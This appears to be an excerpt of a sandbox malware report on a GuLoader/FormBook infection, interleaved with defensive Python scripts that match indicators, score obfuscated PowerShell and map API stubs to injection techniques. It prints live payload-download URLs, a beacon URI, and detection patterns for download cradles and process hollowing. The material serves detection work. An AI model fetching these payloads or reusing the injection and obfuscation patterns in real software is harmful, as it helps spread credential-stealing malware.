          Source: wab.exe, 0000000A.00000002.2803376291.00000000057E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/cyoeNvCnByBgIccf106.binnJ
          Source: wab.exe, 0000000A.00000002.2803376291.0000000005830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/cyoeNvCnByBgIccf106.binq
          Source: clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownHTTPS traffic detected: 103.211.216.55:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.83.114.124:443 -> 192.168.2.5:49712 version: TLS 1.2
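The network entries above (two IPs seen with other malware, two JA3 client fingerprints, three DNS queries, a GuLoader stage download from econstramedia.com, a second-stage download from tejarat-gram.com, and a FormBook-style GET to www.387mfyr.sbs) are the indicators an analyst would carry into proxy and DNS telemetry. The following script is an added example, not part of the Joe Sandbox report: it parses signature lines in the cleaned "Source: ... | ..." form used on this page into an indicator set and matches proxy log records against it. REPORT_LINES are quoted (abridged) from this page; PROXY_LOG records and their format are constructed for the demonstration; BEACON_RE is the author's heuristic derived from the single beacon URI observed above and must be tuned before production use.

```python
"""Extract network IOCs from Joe Sandbox-style signature lines and match them
against proxy log records. Added example; REPORT_LINES quoted (abridged) from
the report, PROXY_LOG constructed, BEACON_RE a heuristic of the author's."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

REPORT_LINES = [
    "Source: Joe Sandbox View | IP Address: 137.220.252.40",
    "Source: Joe Sandbox View | IP Address: 103.211.216.55",
    "Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e",
    "Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19",
    "Source: global traffic | DNS traffic detected: DNS query: econstramedia.com",
    "Source: global traffic | DNS traffic detected: DNS query: tejarat-gram.com",
    "Source: global traffic | DNS traffic detected: DNS query: www.387mfyr.sbs",
    "Source: global traffic | HTTP traffic detected: GET /Teglbrnderier.snp HTTP/1.1 | Host: econstramedia.com | Connection: Keep-Alive",
    "Source: global traffic | HTTP traffic detected: GET /cyoeNvCnByBgIccf106.bin HTTP/1.1 | Host: tejarat-gram.com | Cache-Control: no-cache",
    "Source: global traffic | HTTP traffic detected: GET /abt9/?9Z=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA==&et=y8bdBnFxh HTTP/1.1 | Host: www.387mfyr.sbs | Connection: close",
]

# Constructed proxy log: "<ts> <client> <method> <url> <status> [ja3=<hash>]".
PROXY_LOG = [
    "2024-07-11T11:13:20Z 192.168.2.5 GET https://econstramedia.com/Teglbrnderier.snp 200 ja3=3b5074b1b5d032e5620f69f9f700ff0e",
    "2024-07-11T11:13:22Z 192.168.2.5 GET https://tejarat-gram.com/cyoeNvCnByBgIccf106.bin 200 ja3=37f463bf4616ecd445d4a1937da06e19",
    "2024-07-11T11:13:26Z 192.168.2.5 GET http://www.387mfyr.sbs/abt9/?9Z=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA==&et=y8bdBnFxh 404",
    "2024-07-11T11:14:00Z 192.168.2.7 GET https://www.ecosia.org/newtab/ 200 ja3=00000000000000000000000000000000",
    "2024-07-11T11:14:30Z 192.168.2.9 GET https://137.220.252.40/ 200",
]

IP_RE = re.compile(r"IP Address: (\d{1,3}(?:\.\d{1,3}){3})")
JA3_RE = re.compile(r"JA3 fingerprint: ([0-9a-f]{32})")
DNS_RE = re.compile(r"DNS query: ([\w.-]+)")
HTTP_RE = re.compile(r"HTTP traffic detected: (?:GET|POST) (\S+) HTTP/1\.[01].*?Host: ([\w.-]+)")
# Heuristic shape of the observed beacon: /<short>/?<key>=<long base64>&<key>=<short token>
BEACON_RE = re.compile(
    r"^/[A-Za-z0-9]{2,8}/\?[A-Za-z0-9]{1,4}=[A-Za-z0-9+/%=]{24,}&[A-Za-z0-9]{1,4}=[A-Za-z0-9]{4,16}$")
PROXY_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})(?: ja3=(?P<ja3>[0-9a-f]{32}))?$")


@dataclass
class IocSet:
    ips: set = field(default_factory=set)
    ja3: set = field(default_factory=set)
    domains: set = field(default_factory=set)
    urls: set = field(default_factory=set)   # "<host><path>" without query string


def extract_iocs(lines):
    """Pull IPs, JA3 hashes, queried domains and requested host+path pairs."""
    iocs = IocSet()
    for line in lines:
        m = IP_RE.search(line)
        if m:
            iocs.ips.add(m.group(1))
            continue
        m = JA3_RE.search(line)
        if m:
            iocs.ja3.add(m.group(1))
            continue
        m = DNS_RE.search(line)
        if m:
            iocs.domains.add(m.group(1).lower())
            continue
        m = HTTP_RE.search(line)
        if m:
            path, host = m.group(1).split("?", 1)[0], m.group(2).lower()
            iocs.domains.add(host)
            iocs.urls.add(host + path)
    return iocs


def match_proxy_log(log_lines, iocs):
    """Return [(line_no, [reasons])] for records touching any indicator or the beacon shape."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = PROXY_RE.match(line)
        if not m:
            continue
        u = urlsplit(m["url"])
        host = (u.hostname or "").lower()
        reasons = []
        if host in iocs.domains:
            reasons.append(f"domain:{host}")
        if host in iocs.ips:
            reasons.append(f"ip:{host}")
        if host + u.path in iocs.urls:
            reasons.append("url")
        if m["ja3"] and m["ja3"] in iocs.ja3:
            reasons.append(f"ja3:{m['ja3']}")
        if BEACON_RE.match(u.path + ("?" + u.query if u.query else "")):
            reasons.append("formbook-style beacon uri")
        if reasons:
            hits.append((n, reasons))
    return hits


if __name__ == "__main__":
    for n, reasons in match_proxy_log(PROXY_LOG, extract_iocs(REPORT_LINES)):
        print(n, PROXY_LOG[n - 1].split()[3], reasons)
```

The beacon regex is deliberately the weakest signal: it will fire on some legitimate CDN and tracking URLs, so treat it as a pivot to inspect rather than an alert on its own, and rely on the domain, URL and JA3 matches for confident hits. Note that the strings in process memory (ecosia, duckduckgo, login.live.com) are browser and OS artefacts, not contact points, and are intentionally left out of the indicator set.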

E-Banking Fraud

Source: Yara match | File source: 0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3034142738.0000000002740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2819135013.0000000022090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: amsi32_7108.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 0000000A.00000002.2791447025.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.3034416950.0000000004020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.3289574543.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.3034142738.0000000002740000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2819135013.0000000022090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3288337400.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 4324, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 6829
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 6853
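Two facts above are cheap to turn into a host-side detection: the cmd.exe -> powershell.exe launch carried a command line of 6829 bytes (6853 for the PowerShell child), and the AMSI buffer matched ditekSHen's rule for base64 content, string concatenation and execution. The script below is an added example, not part of the report or of that YARA rule: it scores process-creation events (Sysmon event 1 or 4688 style, reduced to the fields used) for command-line length, encoded or base64 payloads, heavy single-quote concatenation, execution and download tokens, and a script-host parent. The events are constructed; the obfuscated one is a synthetic stand-in that reproduces the shape of the observed command line, not the sample's actual content, and the thresholds and weights are the author's assumptions.

```python
"""Score process-creation events for long, obfuscated PowerShell command lines.
Added example; events are constructed, weights and thresholds are assumptions."""
import base64
import re

LENGTH_THRESHOLD = 4096          # assumption; the report's command lines were 6829/6853 bytes
CONCAT_THRESHOLD = 10            # assumption; 'a'+'b'+... fragments before it counts
FLAG_AT = 5                      # assumption; total score at which an event is flagged

B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
CONCAT_RE = re.compile(r"'[^']*'\s*\+\s*(?=')")               # 'frag' + 'frag' string building
ENCODED_FLAG_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}")
TOKEN_RES = {
    "FromBase64String": re.compile(r"(?i)frombase64string"),
    "Invoke-Expression/IEX": re.compile(r"(?i)\b(?:invoke-expression|iex)\b"),
    "download cradle": re.compile(r"(?i)download(?:string|file)"),
    "hidden window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "execution policy bypass": re.compile(r"(?i)-e(?:xecutionpolicy|p)\s+bypass"),
}
SCRIPT_HOST_PARENTS = ("\\cmd.exe", "\\wscript.exe", "\\cscript.exe", "\\mshta.exe")


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    cmd = event["CommandLine"]
    score, reasons = 0, []
    if len(cmd) >= LENGTH_THRESHOLD:
        score += 3
        reasons.append(f"length {len(cmd)} >= {LENGTH_THRESHOLD}")
    if ENCODED_FLAG_RE.search(cmd):
        score += 3
        reasons.append("-EncodedCommand payload")
    if B64_BLOB_RE.search(cmd):
        score += 2
        reasons.append("inline base64 blob")
    n_concat = len(CONCAT_RE.findall(cmd))
    if n_concat >= CONCAT_THRESHOLD:
        score += 2
        reasons.append(f"{n_concat} string concatenations")
    for label, rx in TOKEN_RES.items():
        if rx.search(cmd):
            score += 1
            reasons.append(label)
    parent = event.get("ParentImage", "")
    if parent.lower().endswith(SCRIPT_HOST_PARENTS):
        score += 1
        reasons.append("spawned by script host " + parent)
    return score, reasons


def triage(events):
    """Score every event; 'flagged' is True at or above FLAG_AT."""
    out = []
    for ev in events:
        score, reasons = score_event(ev)
        out.append({"ProcessId": ev["ProcessId"], "score": score,
                    "flagged": score >= FLAG_AT, "reasons": reasons})
    return out


def synthetic_obfuscated_cmdline():
    """Constructed stand-in for a ~6 KB loader command line: hundreds of quoted
    fragments joined with '+', then a base64 blob fed to FromBase64String and IEX."""
    fragments = "+".join(f"'x{i:03d}'" for i in range(400))
    blob = base64.b64encode(b"A" * 1200).decode()
    return ('powershell.exe -nop -w hidden -ep bypass -c "$s=(' + fragments + ');'
            "$b=[Convert]::FromBase64String('" + blob + "');IEX $s\"")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed
    {"ProcessId": 9001, "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": synthetic_obfuscated_cmdline()},
    {"ProcessId": 9002, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service -Name Spooler"},
    {"ProcessId": 9003, "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -w hidden -c Get-Date"},
]

if __name__ == "__main__":
    for r in triage(EVENTS):
        print(r["ProcessId"], r["score"], r["flagged"], r["reasons"])
```

Length alone is a weak signal (legitimate installers and management agents also pass long command lines), which is why it only contributes three of the five points needed; the third constructed event shows that a hidden window launched from cmd.exe is not enough on its own. Pair this with the AMSI/script-block log (event 4104) content, which is where the base64 and concatenation patterns the YARA rule targets actually live once the script is decoded.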
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B35C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B4340 NtSetContextThread
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B4650 NtSuspendThread
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2B60 NtClose
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2BA0 NtEnumerateValueKey
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2B80 NtQueryInformationFile
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2BF0 NtAllocateVirtualMemory
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2BE0 NtQueryValueKey
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2AB0 NtWaitForSingleObject
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2AF0 NtWriteFile
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2AD0 NtReadFile
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2D30 NtUnmapViewOfSection
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2D10 NtMapViewOfSection
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2D00 NtSetInformationFile
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2DB0 NtEnumerateKey
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2DD0 NtDelayExecution
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2C00 NtQueryInformationProcess
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2C60 NtCreateKey
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2CA0 NtQueryInformationToken
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2CF0 NtOpenProcess
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2CC0 NtQueryVirtualMemory
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2F30 NtCreateSection
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2F60 NtCreateProcessEx
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2FB0 NtResumeThread
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2FA0 NtQuerySection
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2F90 NtProtectVirtualMemory
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2FE0 NtCreateFile
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2E30 NtWriteVirtualMemory
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2EA0 NtAdjustPrivilegesToken
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2E80 NtReadVirtualMemory
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2EE0 NtQueueApcThread
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B3010 NtOpenDirectoryObject
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B3090 NtSetValueKey
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B39B0 NtGetContextThread
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B3D10 NtOpenProcessToken
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B3D70 NtOpenThread
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_042952A1 Sleep,NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_044035C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04404650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04403090 NtSetValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04404340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_044039B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04403010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04403D70 NtOpenThread
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04403D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402FA0 NtQuerySection
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0410CA08 NtCreateSection,NtMapViewOfSection
Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0410C3C8 NtQueryInformationProcess,NtReadVirtualMemory
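The native-API inventory above is the same in the injected wab.exe (process 10) and clip.exe (process 14): a private table of Nt* stubs at 0x213B2xxx / 0x04402xxx covering section creation and mapping, remote memory allocation, write and protection changes, APC queuing, thread context get/set with suspend/resume, and NtCreateProcessEx plus NtUnmapViewOfSection. Reading that list by hand is error-prone, so the following added example (not part of the report) parses "Source: ... | Code function: <proc>_2_<addr> <api>,<api>," lines into a per-process API set and checks it against small API groups that characterise common injection techniques. The wab.exe and clip.exe lines are quoted from this page; the notepad.exe lines are a constructed benign control; the technique groups are the author's own heuristics, not Joe Sandbox's signatures.

```python
"""Map a process's resolved Nt* stub inventory to injection-technique hypotheses.
Added example; report lines quoted from the page, notepad.exe lines constructed,
technique groups are the author's heuristics."""
import re
from collections import defaultdict

REPORT_LINES = [
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2F30 NtCreateSection,",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2D10 NtMapViewOfSection,",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2D30 NtUnmapViewOfSection,",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2BF0 NtAllocateVirtualMemory,",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2E30 NtWriteVirtualMemory,",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2F90 NtProtectVirtualMemory,",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B3D70 NtOpenThread,",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2EE0 NtQueueApcThread,",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B4650 NtSuspendThread,",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B39B0 NtGetContextThread,",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B4340 NtSetContextThread,",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2FB0 NtResumeThread,",
    r"Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_213B2F60 NtCreateProcessEx,",
    r"Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402F30 NtCreateSection,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402D10 NtMapViewOfSection,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402D30 NtUnmapViewOfSection,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402BF0 NtAllocateVirtualMemory,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402E30 NtWriteVirtualMemory,",
    r"Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402F90 NtProtectVirtualMemory,",
    r"Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04403D70 NtOpenThread,",
    r"Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402EE0 NtQueueApcThread,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04404650 NtSuspendThread,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_044039B0 NtGetContextThread,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04404340 NtSetContextThread,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402FB0 NtResumeThread,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_04402F60 NtCreateProcessEx,",
    r"Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0410CA08 NtCreateSection,NtMapViewOfSection,",
    r"Source: C:\Windows\SysWOW64\clip.exe | Code function: 14_2_0410C3C8 NtQueryInformationProcess,NtReadVirtualMemory,",
    # constructed benign control: a process that only does ordinary file I/O
    r"Source: C:\Windows\System32\notepad.exe | Code function: 99_2_00401000 NtClose,NtReadFile,",
    r"Source: C:\Windows\System32\notepad.exe | Code function: 99_2_00401040 NtAllocateVirtualMemory,",
]

CODE_FN_RE = re.compile(
    r"Source: (?P<image>.+?) \| Code function: (?P<proc>\d+)_2_(?P<addr>[0-9A-Fa-f]+) (?P<apis>(?:\w+,)+)")

# Heuristic API groups (author's own). A technique is reported when every API in
# the group is present in the process's stub inventory; presence does not prove
# the calls are made in that order, so treat the output as hypotheses.
TECHNIQUES = {
    "section mapping into a remote process": {"NtCreateSection", "NtMapViewOfSection"},
    "remote memory write (alloc/write/protect)": {"NtAllocateVirtualMemory", "NtWriteVirtualMemory",
                                                  "NtProtectVirtualMemory"},
    "APC injection": {"NtOpenThread", "NtQueueApcThread"},
    "thread context hijack": {"NtSuspendThread", "NtGetContextThread", "NtSetContextThread",
                              "NtResumeThread"},
    "process hollowing": {"NtCreateProcessEx", "NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
}


def parse_api_inventory(lines):
    """Return {"<image>#<proc>": {Nt* names}} from Code function lines."""
    inventory = defaultdict(set)
    for line in lines:
        m = CODE_FN_RE.search(line)
        if not m:
            continue
        image = m["image"].rsplit("\\", 1)[-1].lower()
        key = f"{image}#{m['proc']}"
        inventory[key].update(a for a in m["apis"].split(",") if a.startswith("Nt"))
    return dict(inventory)


def techniques_for(apis):
    """Names of every technique whose API group is fully covered by `apis`."""
    return sorted(name for name, group in TECHNIQUES.items() if group <= apis)


def assess(lines):
    """Per-process technique hypotheses."""
    return {key: techniques_for(apis) for key, apis in parse_api_inventory(lines).items()}


if __name__ == "__main__":
    for key, found in assess(REPORT_LINES).items():
        print(key, "->", found or "no injection primitives")
```

Both injected processes cover every group, which is consistent with a loader that carries its own syscall table rather than importing from ntdll; the benign control covers none. Corroborate the hypotheses with the dynamic evidence the sandbox records (foreign memory writes, suspended-process creation, APC queuing) before asserting a specific technique, and note that the pairing NtQueryInformationProcess plus NtReadVirtualMemory at 14_2_0410C3C8 is the usual way to read another process's PEB before hollowing it.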
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F3C292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F3B4E6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_0415F1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_0415FAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_0415EEA8
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21408158
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21370100
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2141A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214381CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214401AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21412000
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2143A352
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214403E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_2138E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_21420274
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_214002C0
